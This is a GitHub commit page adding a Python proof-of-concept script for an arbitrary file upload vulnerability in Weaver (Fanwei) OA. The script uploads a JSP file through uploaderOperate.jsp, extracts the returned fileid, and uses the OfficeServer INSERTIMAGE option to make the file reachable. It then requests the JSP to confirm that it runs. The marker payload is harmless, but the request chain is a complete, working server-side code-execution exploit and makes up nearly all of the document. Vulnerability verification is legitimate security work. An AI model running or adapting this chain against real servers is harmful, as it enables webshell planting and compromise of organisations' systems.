Skip to content

Commit aa8e1f6

Browse files
myh0stmyh0st
authored
Create weaver-uploadoperation-file-upload.py
1 parent ae3a30f commit aa8e1f6

File tree

1 file changed

+107
-0
lines changed

1 file changed

+107
-0
lines changed

weaver-uploadoperation-file-upload.py

+107
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,107 @@
1+
#!/usr/bin/env python3
2+
#-*- coding: utf-8 -*-
3+
#author: myh0st@xazlsec
4+
5+
import requests
6+
import random
7+
import string
8+
import sys
9+
import base64
10+
11+
12+
def generate_random_string(length=5):
13+
"""生成随机字符串"""
14+
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
15+
16+
def verify(target_url):
17+
"""
18+
检测泛微 OA workrelate/plan/util/uploaderOperate.jsp 接口的任意文件上传漏洞
19+
:param target_url: 目标 URL(例如:http://example.com)
20+
"""
21+
try:
22+
# 生成随机文件名和字符串
23+
filename = generate_random_string()
24+
random_string = generate_random_string(10)
25+
26+
# 构造请求 URL 和文件路径
27+
upload_url = f"{target_url}/workrelate/plan/util/uploaderOperate.jsp"
28+
file_url = f"{target_url}/{filename}.jsp"
29+
30+
# 请求头
31+
headers = {
32+
"Host": target_url.split("//")[1].split("/")[0],
33+
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36",
34+
"Accept": "*/*",
35+
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj",
36+
"Accept-Encoding": "gzip",
37+
}
38+
39+
# 请求体
40+
body = (
41+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
42+
'Content-Disposition: form-data; name="secId"\r\n\r\n'
43+
"1\r\n"
44+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
45+
f'Content-Disposition: form-data; name="Filedata"; filename="{filename}.jsp"\r\n\r\n'
46+
f"<%out.println('{random_string}');%>\r\n"
47+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
48+
'Content-Disposition: form-data; name="plandetailid"\r\n\r\n'
49+
"1\r\n"
50+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj--\r\n"
51+
)
52+
53+
# 发送 POST 请求上传文件
54+
print(f"[*] Uploading file to: {upload_url}")
55+
response_upload = requests.post(upload_url, headers=headers, data=body, timeout=10)
56+
print(f"[*] Upload response status code: {response_upload.status_code}")
57+
58+
# 提取 fileid
59+
fileid = None
60+
if response_upload.status_code == 200 and "workrelate/plan/util/ViewDoc" in response_upload.text:
61+
print("[+] File uploaded successfully.")
62+
# 假设 fileid 在响应中可以通过正则提取
63+
import re
64+
match = re.search(r"&fileid=(.*?)'>", response_upload.text)
65+
if match:
66+
fileid = match.group(1)
67+
print(f"[+] Extracted fileid: {fileid}")
68+
else:
69+
print("[-] Failed to extract fileid.")
70+
else:
71+
print("[-] File upload failed.")
72+
return
73+
74+
# 发送 POST 请求插入图片
75+
insert_url = f"{target_url}/OfficeServer"
76+
insert_body = (
77+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
78+
'Content-Disposition: form-data; name="aaa"\r\n\r\n'
79+
f'{{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{fileid}"}}\r\n'
80+
"------WebKitFormBoundaryVdb2RRl25PuaGhWj--\r\n"
81+
)
82+
print(f"[*] Inserting image with fileid: {fileid}")
83+
response_insert = requests.post(insert_url, headers=headers, data=insert_body, timeout=10)
84+
print(f"[*] Insert response status code: {response_insert.status_code}")
85+
86+
# 发送 GET 请求访问上传的文件
87+
print(f"[*] Accessing file at: {file_url}")
88+
response_file = requests.get(file_url, headers=headers, timeout=10)
89+
print(f"[*] File access response status code: {response_file.status_code}")
90+
91+
# 检查漏洞是否存在
92+
if response_file.status_code == 200 and random_string in response_file.text:
93+
print("[+] Vulnerability detected! File uploaded and accessed successfully.")
94+
return file_url
95+
else:
96+
print("[-] No vulnerability detected.")
97+
98+
except requests.exceptions.RequestException as e:
99+
print(f"[-] Error: {e}")
100+
return False
101+
if __name__=="__main__":
102+
target = sys.argv[1]
103+
data = verify(target)
104+
if data:
105+
print("[+]漏洞存在,上传后的图片路径为:", data)
106+
else:
107+
print("[-]漏洞不存在")

0 commit comments

Comments
 (0)